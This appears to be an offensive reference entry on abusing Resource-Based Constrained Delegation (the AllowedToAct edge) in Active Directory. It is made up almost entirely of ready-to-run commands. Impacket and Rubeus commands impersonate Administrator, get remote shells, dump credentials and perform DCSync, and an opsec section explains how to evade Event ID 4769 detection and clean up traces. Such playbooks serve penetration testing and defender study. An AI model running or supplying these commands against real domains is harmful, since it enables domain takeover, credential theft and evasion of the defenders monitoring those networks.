AllowedToAct
Source principal is listed in the target computer's msDS-AllowedToActOnBehalfOfOtherIdentity attribute, meaning it can perform Resource-Based Constrained Delegation (RBCD) β impersonate any domain user to the target computer's services.
Applies to: User/Group/Computer β Computer
The source principal must have an SPN configured (or use the SPN-less U2U technique). Target user must not be in Protected Users or marked sensitive.
Linux Abuse
Step 1: Obtain service ticket impersonating target user (source principal already has RBCD rights)
# Source principal is a computer account with known password
getST.py -spn 'cifs/<target-computer>.<domain>' -impersonate Administrator \
-dc-ip <dc-ip> '<domain>/<source-computer>$:<source-password>'
# Source principal via Pass-the-Hash
getST.py -spn 'cifs/<target-computer>.<domain>' -impersonate Administrator \
-dc-ip <dc-ip> -hashes ':<ntlm-hash>' '<domain>/<source-computer>$'
# AES key
getST.py -spn 'cifs/<target-computer>.<domain>' -impersonate Administrator \
-dc-ip <dc-ip> -aesKey '<aes-key>' '<domain>/<source-computer>$'
Step 2: Use the ticket for access
export KRB5CCNAME=Administrator@cifs_<target-computer>.<domain>@<domain>.ccache
# Remote execution
wmiexec.py -k -no-pass '<domain>/Administrator@<target-computer>.<domain>'
smbexec.py -k -no-pass '<domain>/Administrator@<target-computer>.<domain>'
# Credential dump
secretsdump.py -k -no-pass '<domain>/Administrator@<target-computer>.<domain>'
# Shell
psexec.py -k -no-pass '<domain>/Administrator@<target-computer>.<domain>'
LDAP pivot β if target is DC (DCSync)
getST.py -spn 'ldap/<dc-hostname>.<domain>' -impersonate Administrator \
-dc-ip <dc-ip> '<domain>/<source-computer>$:<source-password>'
export KRB5CCNAME=Administrator@ldap_<dc-hostname>.<domain>@<domain>.ccache
secretsdump.py -k -no-pass '<domain>/Administrator@<dc-hostname>.<domain>' -just-dc-ntlm
SPN-less controlled account (U2U)
# Get TGT for controlled user (no SPN needed)
getTGT.py '<domain>/<controlled-user>:<password>'
# Extract ticket session key
describeTicket.py '<controlled-user>.ccache' | grep 'Ticket Session Key'
# Temporarily swap NT hash for session key
changepasswd.py -newhashes ':<session-key>' '<domain>/<controlled-user>:<password>@<dc-ip>'
# Full S4U2self+U2U+S4U2proxy
KRB5CCNAME='<controlled-user>.ccache' getST.py -u2u -impersonate Administrator \
-spn 'host/<target-computer>.<domain>' -k -no-pass '<domain>/<controlled-user>'
# Restore original password
changepasswd.py -hashes ':<session-key>' -newhashes ':<original-ntlm-hash>' \
'<domain>/<controlled-user>@<dc-ip>'
export KRB5CCNAME=Administrator@host_<target-computer>.<domain>@<domain>.ccache
wmiexec.py -k -no-pass '<domain>/Administrator@<target-computer>.<domain>'
Verify RBCD is already configured on target
rbcd.py -delegate-to '<target-computer>$' -dc-ip <dc-ip> -action read '<domain>/<username>:<password>'
Windows Abuse
Step 1: Hash the source principal's password
Rubeus.exe hash /password:<source-password>
Step 2: S4U2self + S4U2proxy
Rubeus.exe s4u /user:<source-computer>$ /rc4:<ntlm-hash> /impersonateuser:Administrator \
/msdsspn:cifs/<target-computer>.<domain> /ptt
# AES256 variant
Rubeus.exe s4u /user:<source-computer>$ /aes256:<aes-key> /impersonateuser:Administrator \
/msdsspn:cifs/<target-computer>.<domain> /ptt
Step 3: Access target
ls \\<target-computer>.<domain>\c$
Enter-PSSession -ComputerName <target-computer>.<domain>
PowerView β verify RBCD attribute
Get-DomainComputer <target-computer> -Properties msds-allowedtoactonbehalfofotheridentity
Cleanup
Set-DomainObject <target-computer> -Clear 'msds-allowedtoactonbehalfofotheridentity'
Opsec
- S4U chain generates Event ID 4769 on DC β two requests in quick succession (self + proxy)
- Prefer AES256 over RC4 to avoid downgrade detection (Event ID 4769 encryption type 0x17)
- Target user must not be in Protected Users group or flagged sensitive for delegation
- RBCD on a DC: use LDAP SPN for DCSync rather than CIFS for a lower footprint than psexec
- Cleanup msDS-AllowedToActOnBehalfOfOtherIdentity if you wrote it (WriteAccountRestrictions path)